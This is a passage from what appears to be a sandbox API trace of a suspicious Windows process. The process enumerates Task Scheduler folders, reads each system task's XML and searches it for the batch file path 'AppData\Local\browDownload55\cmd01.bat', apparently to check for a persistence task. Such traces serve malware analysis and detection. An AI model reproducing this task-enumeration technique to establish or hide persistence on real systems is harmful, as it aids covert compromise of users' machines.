wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppFolder=0xce030 | out: ppFolder=0xce030*=0x929700) returned 0x0 [0163.721] ITaskFolder:GetTasks (in: This=0x929700, flags=1, ppTasks=0xcdea0 | out: ppTasks=0xcdea0*=0x9297d0) returned 0x0 [0163.725] IRegisteredTaskCollection:get_Count (in: This=0x9297d0, pCount=0xcde98 | out: pCount=0xcde98*=0) returned 0x0 [0163.725] IUnknown:Release (This=0x9297d0) returned 0x0 [0163.725] ITaskFolder:GetFolders (in: This=0x929700, flags=0, ppFolders=0xcde88 | out: ppFolders=0xcde88*=0x9297d0) returned 0x0 [0163.728] ITaskFolderCollection:get_Count (in: This=0x9297d0, pCount=0xcde94 | out: pCount=0xcde94*=0) returned 0x0 [0163.728] IUnknown:Release (This=0x9297d0) returned 0x0 [0163.728] TaskScheduler:IUnknown:Release (This=0x929700) returned 0x0 [0163.728] IUnknown:Release (This=0x929580) returned 0x0 [0163.728] TaskScheduler:IUnknown:Release (This=0x9294c0) returned 0x0 [0163.728] ITaskFolderCollection:get_Item (in: This=0x929340, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2c, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9294c0) returned 0x0 [0163.728] ITaskFolder:GetTasks (in: This=0x9294c0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929590) returned 0x0 [0163.732] IRegisteredTaskCollection:get_Count (in: This=0x929590, pCount=0xce048 | out: pCount=0xce048*=4) returned 0x0 [0163.732] IRegisteredTaskCollection:get_Item (in: This=0x929590, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929720) returned 0x0 [0163.732] IRegisteredTask:get_Name (in: This=0x929720, pName=0xce058 | out: pName=0xce058*="Device Install Group Policy") returned 0x0 [0163.732] IRegisteredTask:get_Xml (in: This=0x929720, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)\r\n $(@%SystemRoot%\\system32\\pnppolicy.dll,-600)\r\n $(@%SystemRoot%\\system32\\pnppolicy.dll,-602)\r\n \\Microsoft\\Windows\\Plug and Play\\Device Install Group Policy\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n P1D\r\n true\r\n Queue\r\n 6\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 7508BCA32A1E890D\r\n \r\n \r\n \r\n \r\n {60400283-B242-4FA8-8C25-CAF695B88209}\r\n \r\n \r\n") returned 0x0 [0163.735] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)\r\n $(@%SystemRoot%\\system32\\pnppolicy.dll,-600)\r\n $(@%SystemRoot%\\system32\\pnppolicy.dll,-602)\r\n \\Microsoft\\Windows\\Plug and Play\\Device Install Group Policy\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n P1D\r\n true\r\n Queue\r\n 6\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 7508BCA32A1E890D\r\n \r\n \r\n \r\n \r\n {60400283-B242-4FA8-8C25-CAF695B88209}\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.735] IUnknown:Release (This=0x929720) returned 0x0 [0163.735] IRegisteredTaskCollection:get_Item (in: This=0x929590, index=0xce098*(varType=0x3, wReserved1=0x3335, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929720) returned 0x0 [0163.735] IRegisteredTask:get_Name (in: This=0x929720, pName=0xce058 | out: pName=0xce058*="Device Install Reboot Required") returned 0x0 [0163.735] IRegisteredTask:get_Xml (in: This=0x929720, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n O:BAG:BAD:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;;FR;;;IU)\r\n $(@%SystemRoot%\\system32\\pnpui.dll,-600)\r\n $(@%SystemRoot%\\system32\\pnpui.dll,-602)\r\n \\Microsoft\\Windows\\Plug and Play\\Device Install Reboot Required\r\n \r\n \r\n \r\n S-1-5-4\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n false\r\n true\r\n IgnoreNew\r\n 6\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 7508BCA33D009602\r\n \r\n \r\n \r\n \r\n {48794782-6A1F-47B9-BD52-1D5F95D49C1B}\r\n \r\n \r\n") returned 0x0 [0163.737] StrStrIW (lpFirst="\r\n\r\n \r\n O:BAG:BAD:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;;FR;;;IU)\r\n $(@%SystemRoot%\\system32\\pnpui.dll,-600)\r\n $(@%SystemRoot%\\system32\\pnpui.dll,-602)\r\n \\Microsoft\\Windows\\Plug and Play\\Device Install Reboot Required\r\n \r\n \r\n \r\n S-1-5-4\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n false\r\n true\r\n IgnoreNew\r\n 6\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 7508BCA33D009602\r\n \r\n \r\n \r\n \r\n {48794782-6A1F-47B9-BD52-1D5F95D49C1B}\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.737] IUnknown:Release (This=0x929720) returned 0x0 [0163.737] IRegisteredTaskCollection:get_Item (in: This=0x929590, index=0xce098*(varType=0x3, wReserved1=0x7f, wReserved2=0x0, wReserved3=0x0, varVal1=0x3, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929720) returned 0x0 [0163.737] IRegisteredTask:get_Name (in: This=0x929720, pName=0xce058 | out: pName=0xce058*="Plug and Play Cleanup") returned 0x0 [0163.737] IRegisteredTask:get_Xml (in: This=0x929720, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 1.0\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)\r\n $(@%SystemRoot%\\system32\\pnpclean.dll,-201)\r\n $(@%SystemRoot%\\system32\\pnpclean.dll,-201)\r\n $(@%SystemRoot%\\system32\\pnpclean.dll,-202)\r\n \\Microsoft\\Windows\\Plug and Play\\Plug and Play Cleanup\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n true\r\n true\r\n PT1H\r\n IgnoreNew\r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P1M\r\n P2M\r\n \r\n \r\n \r\n \r\n \r\n {DEF03232-9688-11E2-BE7F-B4B52FD966FF}\r\n \r\n \r\n") returned 0x0 [0163.738] StrStrIW (lpFirst="\r\n\r\n \r\n 1.0\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)\r\n $(@%SystemRoot%\\system32\\pnpclean.dll,-201)\r\n $(@%SystemRoot%\\system32\\pnpclean.dll,-201)\r\n $(@%SystemRoot%\\system32\\pnpclean.dll,-202)\r\n \\Microsoft\\Windows\\Plug and Play\\Plug and Play Cleanup\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n true\r\n true\r\n PT1H\r\n IgnoreNew\r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P1M\r\n P2M\r\n \r\n \r\n \r\n \r\n \r\n {DEF03232-9688-11E2-BE7F-B4B52FD966FF}\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.739] IUnknown:Release (This=0x929720) returned 0x0 [0163.739] IRegisteredTaskCollection:get_Item (in: This=0x929590, index=0xce098*(varType=0x3, wReserved1=0x3335, wReserved2=0x0, wReserved3=0x0, varVal1=0x4, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929720) returned 0x0 [0163.739] IRegisteredTask:get_Name (in: This=0x929720, pName=0xce058 | out: pName=0xce058*="Sysprep Generalize Drivers") returned 0x0 [0163.739] IRegisteredTask:get_Xml (in: This=0x929720, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)\r\n $(@%SystemRoot%\\System32\\sppnp.dll,-2000)\r\n $(@%SystemRoot%\\System32\\sppnp.dll,-2001)\r\n \\Microsoft\\Windows\\Plug and Play\\Sysprep Generalize Drivers\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n IgnoreNew\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\System32\\drvinst.exe\r\n 6\r\n \r\n \r\n") returned 0x0 [0163.740] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)\r\n $(@%SystemRoot%\\System32\\sppnp.dll,-2000)\r\n $(@%SystemRoot%\\System32\\sppnp.dll,-2001)\r\n \\Microsoft\\Windows\\Plug and Play\\Sysprep Generalize Drivers\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n IgnoreNew\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\System32\\drvinst.exe\r\n 6\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.740] IUnknown:Release (This=0x929720) returned 0x0 [0163.740] IUnknown:Release (This=0x929590) returned 0x0 [0163.740] ITaskFolder:GetFolders (in: This=0x9294c0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929590) returned 0x0 [0163.743] ITaskFolderCollection:get_Count (in: This=0x929590, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0163.743] IUnknown:Release (This=0x929590) returned 0x0 [0163.743] TaskScheduler:IUnknown:Release (This=0x9294c0) returned 0x0 [0163.743] ITaskFolderCollection:get_Item (in: This=0x929340, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2d, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9294c0) returned 0x0 [0163.743] ITaskFolder:GetTasks (in: This=0x9294c0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x9295b0) returned 0x0 [0163.746] IRegisteredTaskCollection:get_Count (in: This=0x9295b0, pCount=0xce048 | out: pCount=0xce048*=1) returned 0x0 [0163.746] IRegisteredTaskCollection:get_Item (in: This=0x9295b0, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929750) returned 0x0 [0163.746] IRegisteredTask:get_Name (in: This=0x929750, pName=0xce058 | out: pName=0xce058*="AnalyzeSystem") returned 0x0 [0163.746] IRegisteredTask:get_Xml (in: This=0x929750, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 1.0\r\n D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GR;;;AU)(A;;FRFX;;;LS)\r\n $(@%systemRoot%\\system32\\energytask.dll,-601)\r\n $(@%systemRoot%\\system32\\energytask.dll,-600)\r\n $(@%systemRoot%\\system32\\energytask.dll,-602)\r\n \\Microsoft\\Windows\\Power Efficiency Diagnostics\\AnalyzeSystem\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n PT5M\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P1D\r\n P2D\r\n true\r\n \r\n \r\n \r\n \r\n \r\n {927EA2AF-1C54-43D5-825E-0074CE028EEE}\r\n \r\n \r\n") returned 0x0 [0163.750] StrStrIW (lpFirst="\r\n\r\n \r\n 1.0\r\n D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GR;;;AU)(A;;FRFX;;;LS)\r\n $(@%systemRoot%\\system32\\energytask.dll,-601)\r\n $(@%systemRoot%\\system32\\energytask.dll,-600)\r\n $(@%systemRoot%\\system32\\energytask.dll,-602)\r\n \\Microsoft\\Windows\\Power Efficiency Diagnostics\\AnalyzeSystem\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n PT5M\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P1D\r\n P2D\r\n true\r\n \r\n \r\n \r\n \r\n \r\n {927EA2AF-1C54-43D5-825E-0074CE028EEE}\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.750] IUnknown:Release (This=0x929750) returned 0x0 [0163.750] IUnknown:Release (This=0x9295b0) returned 0x0 [0163.750] ITaskFolder:GetFolders (in: This=0x9294c0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x9295b0) returned 0x0 [0163.753] ITaskFolderCollection:get_Count (in: This=0x9295b0, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0163.753] IUnknown:Release (This=0x9295b0) returned 0x0 [0163.753] TaskScheduler:IUnknown:Release (This=0x9294c0) returned 0x0 [0163.753] ITaskFolderCollection:get_Item (in: This=0x929340, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2e, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9294c0) returned 0x0 [0163.753] ITaskFolder:GetTasks (in: This=0x9294c0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929580) returned 0x0 [0163.759] IRegisteredTaskCollection:get_Count (in: This=0x929580, pCount=0xce048 | out: pCount=0xce048*=1) returned 0x0 [0163.759] IRegisteredTaskCollection:get_Item (in: This=0x929580, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x9296f0) returned 0x0 [0163.759] IRegisteredTask:get_Name (in: This=0x9296f0, pName=0xce058 | out: pName=0xce058*="MobilityManager") returned 0x0 [0163.759] IRegisteredTask:get_Xml (in: This=0x9296f0, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;LS)\r\n $(@%SystemRoot%\\system32\\rasmbmgr.dll,-201)\r\n $(@%SystemRoot%\\system32\\rasmbmgr.dll,-202)\r\n \\Microsoft\\Windows\\Ras\\MobilityManager\r\n \r\n \r\n \r\n S-1-5-19\r\n \r\n \r\n \r\n false\r\n false\r\n Parallel\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n <QueryList>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n <Query\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n Id=\"0\"\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n Path=\"Application\"\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n >\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n <Select Path=\"Application\">*[System[Provider[@Name='RasClient'] and (Level=4 or Level=0) and (EventID=20281)]]</Select>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n </Query>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n </QueryList>\r\n \r\n \r\n \r\n \r\n {C463A0FC-794F-4FDF-9201-01938CEACAFA}\r\n \r\n \r\n") returned 0x0 [0163.761] StrStrIW (lpFirst="\r\n\r\n \r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;LS)\r\n $(@%SystemRoot%\\system32\\rasmbmgr.dll,-201)\r\n $(@%SystemRoot%\\system32\\rasmbmgr.dll,-202)\r\n \\Microsoft\\Windows\\Ras\\MobilityManager\r\n \r\n \r\n \r\n S-1-5-19\r\n \r\n \r\n \r\n false\r\n false\r\n Parallel\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n <QueryList>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n <Query\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n Id=\"0\"\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n Path=\"Application\"\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n >\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n <Select Path=\"Application\">*[System[Provider[@Name='RasClient'] and (Level=4 or Level=0) and (EventID=20281)]]</Select>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n </Query>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n </QueryList>\r\n \r\n \r\n \r\n \r\n {C463A0FC-794F-4FDF-9201-01938CEACAFA}\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.761] IUnknown:Release (This=0x9296f0) returned 0x0 [0163.761] IUnknown:Release (This=0x929580) returned 0x0 [0163.761] ITaskFolder:GetFolders (in: This=0x9294c0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929580) returned 0x0 [0163.765] ITaskFolderCollection:get_Count (in: This=0x929580, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0163.765] IUnknown:Release (This=0x929580) returned 0x0 [0163.765] TaskScheduler:IUnknown:Release (This=0x9294c0) returned 0x0 [0163.765] ITaskFolderCollection:get_Item (in: This=0x929340, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2f, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9294c0) returned 0x0 [0163.765] ITaskFolder:GetTasks (in: This=0x9294c0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x9295a0) returned 0x0 [0163.768] IRegisteredTaskCollection:get_Count (in: This=0x9295a0, pCount=0xce048 | out: pCount=0xce048*=1) returned 0x0 [0163.768] IRegisteredTaskCollection:get_Item (in: This=0x9295a0, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929730) returned 0x0 [0163.768] IRegisteredTask:get_Name (in: This=0x929730, pName=0xce058 | out: pName=0xce058*="VerifyWinRE") returned 0x0 [0163.768] IRegisteredTask:get_Xml (in: This=0x929730, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 1.0\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;AU)(A;;FRFX;;;LS)\r\n $(@%SystemRoot%\\system32\\ReAgentTask.dll,-602)\r\n $(@%SystemRoot%\\system32\\ReAgentTask.dll,-601)\r\n $(@%SystemRoot%\\system32\\ReAgentTask.dll,-603)\r\n \\Microsoft\\Windows\\RecoveryEnvironment\\VerifyWinRE\r\n \r\n \r\n \r\n S-1-5-32-544\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n true\r\n false\r\n false\r\n PT1H\r\n true\r\n IgnoreNew\r\n true\r\n true\r\n \r\n false\r\n false\r\n \r\n true\r\n \r\n P14D\r\n P1M\r\n \r\n \r\n \r\n \r\n \r\n {89D1D0C2-A3CF-490C-ABE3-B86CDE34B047}\r\n \r\n \r\n \r\n") returned 0x0 [0163.770] StrStrIW (lpFirst="\r\n\r\n \r\n 1.0\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;AU)(A;;FRFX;;;LS)\r\n $(@%SystemRoot%\\system32\\ReAgentTask.dll,-602)\r\n $(@%SystemRoot%\\system32\\ReAgentTask.dll,-601)\r\n $(@%SystemRoot%\\system32\\ReAgentTask.dll,-603)\r\n \\Microsoft\\Windows\\RecoveryEnvironment\\VerifyWinRE\r\n \r\n \r\n \r\n S-1-5-32-544\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n true\r\n false\r\n false\r\n PT1H\r\n true\r\n IgnoreNew\r\n true\r\n true\r\n \r\n false\r\n false\r\n \r\n true\r\n \r\n P14D\r\n P1M\r\n \r\n \r\n \r\n \r\n \r\n {89D1D0C2-A3CF-490C-ABE3-B86CDE34B047}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.770] IUnknown:Release (This=0x929730) returned 0x0 [0163.770] IUnknown:Release (This=0x9295a0) returned 0x0 [0163.771] ITaskFolder:GetFolders (in: This=0x9294c0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x9295a0) returned 0x0 [0163.773] ITaskFolderCollection:get_Count (in: This=0x9295a0, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0163.773] IUnknown:Release (This=0x9295a0) returned 0x0 [0163.773] TaskScheduler:IUnknown:Release (This=0x9294c0) returned 0x0 [0163.773] ITaskFolderCollection:get_Item (in: This=0x929340, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x30, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9294c0) returned 0x0 [0163.773] ITaskFolder:GetTasks (in: This=0x9294c0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929580) returned 0x0 [0163.777] IRegisteredTaskCollection:get_Count (in: This=0x929580, pCount=0xce048 | out: pCount=0xce048*=1) returned 0x0 [0163.778] IRegisteredTaskCollection:get_Item (in: This=0x929580, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929700) returned 0x0 [0163.778] IRegisteredTask:get_Name (in: This=0x929700, pName=0xce058 | out: pName=0xce058*="RegIdleBackup") returned 0x0 [0163.778] IRegisteredTask:get_Xml (in: This=0x929700, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 1.0\r\n O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;IU)(A;;FRFX;;;S-1-5-80-2970612574-78537857-698502321-558674196-1451644582)(A;;FRFX;;;LS)\r\n $(@%systemroot%\\system32\\regidle.dll,-601)\r\n $(@%systemroot%\\system32\\regidle.dll,-600)\r\n $(@%systemroot%\\system32\\regidle.dll,-602)\r\n \\Microsoft\\Windows\\Registry\\RegIdleBackup\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n true\r\n false\r\n PT0S\r\n true\r\n IgnoreNew\r\n 5\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P10D\r\n P14D\r\n \r\n \r\n \r\n \r\n \r\n {CA767AA8-9157-4604-B64B-40747123D5F2}\r\n \r\n \r\n") returned 0x0 [0163.780] StrStrIW (lpFirst="\r\n\r\n \r\n 1.0\r\n O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;IU)(A;;FRFX;;;S-1-5-80-2970612574-78537857-698502321-558674196-1451644582)(A;;FRFX;;;LS)\r\n $(@%systemroot%\\system32\\regidle.dll,-601)\r\n $(@%systemroot%\\system32\\regidle.dll,-600)\r\n $(@%systemroot%\\system32\\regidle.dll,-602)\r\n \\Microsoft\\Windows\\Registry\\RegIdleBackup\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n true\r\n false\r\n PT0S\r\n true\r\n IgnoreNew\r\n 5\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P10D\r\n P14D\r\n \r\n \r\n \r\n \r\n \r\n {CA767AA8-9157-4604-B64B-40747123D5F2}\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.780] IUnknown:Release (This=0x929700) returned 0x0 [0163.780] IUnknown:Release (This=0x929580) returned 0x0 [0163.780] ITaskFolder:GetFolders (in: This=0x9294c0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929580) returned 0x0 [0163.783] ITaskFolderCollection:get_Count (in: This=0x929580, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0163.783] IUnknown:Release (This=0x929580) returned 0x0 [0163.783] TaskScheduler:IUnknown:Release (This=0x9294c0) returned 0x0 [0163.783] ITaskFolderCollection:get_Item (in: This=0x929340, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x31, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9294c0) returned 0x0 [0163.783] ITaskFolder:GetTasks (in: This=0x9294c0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x9295c0) returned 0x0 [0163.786] IRegisteredTaskCollection:get_Count (in: This=0x9295c0, pCount=0xce048 | out: pCount=0xce048*=0) returned 0x0 [0163.786] IUnknown:Release (This=0x9295c0) returned 0x0 [0163.786] ITaskFolder:GetFolders (in: This=0x9294c0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x9295c0) returned 0x0 [0163.793] ITaskFolderCollection:get_Count (in: This=0x9295c0, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0163.793] IUnknown:Release (This=0x9295c0) returned 0x0 [0163.793] TaskScheduler:IUnknown:Release (This=0x9294c0) returned 0x0 [0163.793] ITaskFolderCollection:get_Item (in: This=0x929340, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x32, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9294c0) returned 0x0 [0163.793] ITaskFolder:GetTasks (in: This=0x9294c0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929590) returned 0x0 [0163.797] IRegisteredTaskCollection:get_Count (in: This=0x929590, pCount=0xce048 | out: pCount=0xce048*=1) returned 0x0 [0163.797] IRegisteredTaskCollection:get_Item (in: This=0x929590, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929720) returned 0x0 [0163.797] IRegisteredTask:get_Name (in: This=0x929720, pName=0xce058 | out: pName=0xce058*="RemoteAssistanceTask") returned 0x0 [0163.797] IRegisteredTask:get_Xml (in: This=0x929720, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 2005-11-08T17:18:32\r\n O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)\r\n $(@%systemroot%\\system32\\msra.exe,-687)\r\n $(@%systemroot%\\system32\\msra.exe,-686)\r\n $(@%systemroot%\\system32\\msra.exe,-688)\r\n \\Microsoft\\Windows\\RemoteAssistance\\RemoteAssistanceTask\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n true\r\n true\r\n Queue\r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n PT15S\r\n <QueryList><Query Id=\"0\" Path=\"System\"><Select Path=\"System\">*[System[Provider[@Name='Microsoft-Windows-GroupPolicy'] and EventID=1502]]</Select></Query></QueryList>\r\n \r\n \r\n \r\n \r\n \r\n %windir%\\system32\\RAServer.exe\r\n /offerraupdate\r\n %windir%\r\n \r\n \r\n") returned 0x0 [0163.799] StrStrIW (lpFirst="\r\n\r\n \r\n 2005-11-08T17:18:32\r\n O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)\r\n $(@%systemroot%\\system32\\msra.exe,-687)\r\n $(@%systemroot%\\system32\\msra.exe,-686)\r\n $(@%systemroot%\\system32\\msra.exe,-688)\r\n \\Microsoft\\Windows\\RemoteAssistance\\RemoteAssistanceTask\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n true\r\n true\r\n Queue\r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n PT15S\r\n <QueryList><Query Id=\"0\" Path=\"System\"><Select Path=\"System\">*[System[Provider[@Name='Microsoft-Windows-GroupPolicy'] and EventID=1502]]</Select></Query></QueryList>\r\n \r\n \r\n \r\n \r\n \r\n %windir%\\system32\\RAServer.exe\r\n /offerraupdate\r\n %windir%\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.799] IUnknown:Release (This=0x929720) returned 0x0 [0163.799] IUnknown:Release (This=0x929590) returned 0x0 [0163.799] ITaskFolder:GetFolders (in: This=0x9294c0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929590) returned 0x0 [0163.802] ITaskFolderCollection:get_Count (in: This=0x929590, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0163.802] IUnknown:Release (This=0x929590) returned 0x0 [0163.802] TaskScheduler:IUnknown:Release (This=0x9294c0) returned 0x0 [0163.802] ITaskFolderCollection:get_Item (in: This=0x929340, 